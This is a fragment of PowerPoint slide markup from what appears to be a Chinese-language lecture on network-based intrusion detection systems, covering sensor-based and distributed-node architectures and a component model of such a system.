            <a:off x="685800" y="2209800"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>基于网络的入侵检测系统由遍及网络的传感器（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>Sensor)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>组成，传感器会向中央控制台报告。传感器通常是独立的检测引擎，能获得网络分组、找寻误用模式，然后告警。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>传统的基于传感器的结构</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>分布式网络节点结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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Rectangle 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCE9BA27-4A27-45E4-BBF5-E30B0D610A62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>传统的基于传感器的结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159747" name="Rectangle 1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E7242CA-2D1E-4D66-A3F8-5B90220DB788}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2362200"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>传感器（通常设置为混杂模式）用于嗅探网络上的数据分组，并将分组送往检测引擎</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>检测引擎安装在传感器计算机本身</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>网络分接器分布在关键任务网段上，每个网段一个</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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60770" name="Group 1047">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B1FA8AE-B206-4CFF-8166-210191B43F8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="609600"/>
            <a:ext cx="8305800" cy="5562600"/>
            <a:chOff x="144" y="384"/>
            <a:chExt cx="5232" cy="3504"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="160771" name="Rectangle 1026">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E78460C-2DF2-44C6-B7D4-0A0D528F671C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="384"/>
              <a:ext cx="5232" cy="350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60772" name="Group 1027">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC959732-3FA6-40D0-975F-AEDBA4858EB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="288" y="432"/>
              <a:ext cx="4848" cy="3312"/>
              <a:chOff x="1440" y="2844"/>
              <a:chExt cx="7560" cy="5772"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="160773" name="Rectangle 1028">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC20BA-8D13-41D1-BC5E-6B269C2D2A4D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4500" y="2844"/>
                <a:ext cx="2700" cy="624"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg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管理</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1200">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>/</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1200">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>配置</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="160774" name="Rectangle 1029">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C89CEBC-3DEA-444B-834B-1D849DD07784}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4500" y="4560"/>
                <a:ext cx="2700" cy="624"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>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入侵分析引擎器</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="160775" name="AutoShape 1030">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E9DCB0F-5582-433A-A772-BBFC4B668304}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1440" y="4092"/>
                <a:ext cx="2160" cy="780"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 25000"/>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网络安全数据库</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="160776" name="Line 1031">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC443648-EDC1-4420-8729-6A56EDF96C6B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2520" y="3156"/>
                <a:ext cx="19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77" name="Line 1032">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBCFA678-290F-445A-B009-60102515E35E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2520" y="3156"/>
                <a:ext cx="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78" name="Line 1033">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{142ED10B-5750-4FEE-9C5D-E1725A910D97}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3600" y="4716"/>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79" name="AutoShape 1034">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E6F42EB-885B-4BFE-A803-0398FB8A86DD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5580" y="3468"/>
                <a:ext cx="360" cy="1092"/>
              </a:xfrm>
              <a:prstGeom prst="upArrow">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 50000"/>
                  <a:gd name="adj2" fmla="val 75833"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr vert="eaVert"/>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60780" name="Oval 1035">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB1E352F-2338-44C8-94D6-DDFCEEA77F1B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4140" y="6120"/>
                <a:ext cx="1620" cy="624"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">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嗅探器</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="160781" name="Oval 1036">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8192C32A-990C-43D1-9B22-A19C8DC69370}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6300" y="6120"/>
                <a:ext cx="1620" cy="624"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>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嗅探器</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="160782" name="Line 1037">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{169598CC-CD4C-4F85-A746-8B94CB11745E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2880" y="7368"/>
                <a:ext cx="6120" cy="0"/>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3" name="Line 1038">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB018940-0B52-4EA8-B1D7-A3026F66E926}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4860" y="6744"/>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84" name="Line 1039">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02B0945C-E7B4-494B-A965-20D33BB79CAD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="7200" y="6744"/>
                <a:ext cx="0" cy="62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85" name="Line 1040">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6DA9B6B-92DA-4086-A5E8-5BCF1E42CFC5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4860" y="5184"/>
                <a:ext cx="54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86" name="Line 1041">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F52E37E-38A9-485C-A22B-8716D4A7EC33}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="6300" y="5184"/>
                <a:ext cx="720" cy="93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87" name="Line 1042">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42DAB927-F524-4A4A-90DC-918C3F868156}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7200" y="3156"/>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8" name="Line 1043">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1C5F242-9F1A-4AB0-B191-40295B6386B3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8280" y="3156"/>
                <a:ext cx="0" cy="32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789" name="Line 1044">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57DD3173-F85C-4DEB-BB19-10AC45FCAE6A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="7920" y="6432"/>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0790" name="Rectangle 1045">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ACB0534-6FA0-4310-87D9-0555D79DC1AF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5760" y="3936"/>
                <a:ext cx="1620" cy="62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zh-CN" altLang="en-US" sz="1200">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>分析结果</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="160791" name="Rectangle 1046">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8F5CB60-04EA-4834-B3AB-760E3AA88847}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3240" y="7836"/>
                <a:ext cx="5580" cy="7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800" b="1">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>基于网络的入侵检测系统模型</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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4" name="Rectangle 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F932AE06-7B43-482D-9B68-6CF248D16DCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分布式网络节点结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161795" name="Rectangle 1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{295232C6-437E-4C30-BD0D-DB1765831C73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2133600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" b="1"/>
              <a:t>为解决高速网络上的丢包问题，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="1"/>
              <a:t>1999</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" b="1"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="1"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" b="1"/>
              <a:t>月，出现的一种新的结构，将传感器分布到网络上的每台计算机上</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" b="1"/>
              <a:t>每个传感器检查流经他的网络分组，然后传感器相互通信，主控制台将所有的告警聚集、关联起来</a:t>
            </a:r>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BB5E7781-E288-46A6-A4E5-62F5B563FE24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="381000"/>
            <a:ext cx="8305800" cy="6019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62819" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10C2DBB7-9005-4AB4-8422-9C075E1D3288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="914400"/>
            <a:ext cx="7620000" cy="5029200"/>
            <a:chOff x="1620" y="3000"/>
            <a:chExt cx="8100" cy="4836"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="162820" name="AutoShape 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC942D71-86F5-4224-8C45-B86803FCC691}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1620" y="3000"/>
              <a:ext cx="2340" cy="624"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>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数据采集构件</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="162821" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38C8A4CD-87BE-491E-81E2-BAED49BF4320}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1620" y="5652"/>
              <a:ext cx="2340" cy="624"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>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应急处理构件</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="162822" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D1708B5-230A-48FF-9C2D-7E2BF71FF22B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7380" y="3000"/>
              <a:ext cx="2340" cy="624"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>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通信传输构件</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="162823" name="AutoShape 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CDD3004-DAEA-4E53-8EF5-25273885A472}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7380" y="5652"/>
              <a:ext cx="2340" cy="624"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>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检测分析构件</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="162824" name="AutoShape 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF0468DD-75FE-4B4D-ADE1-CD91C2A97972}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
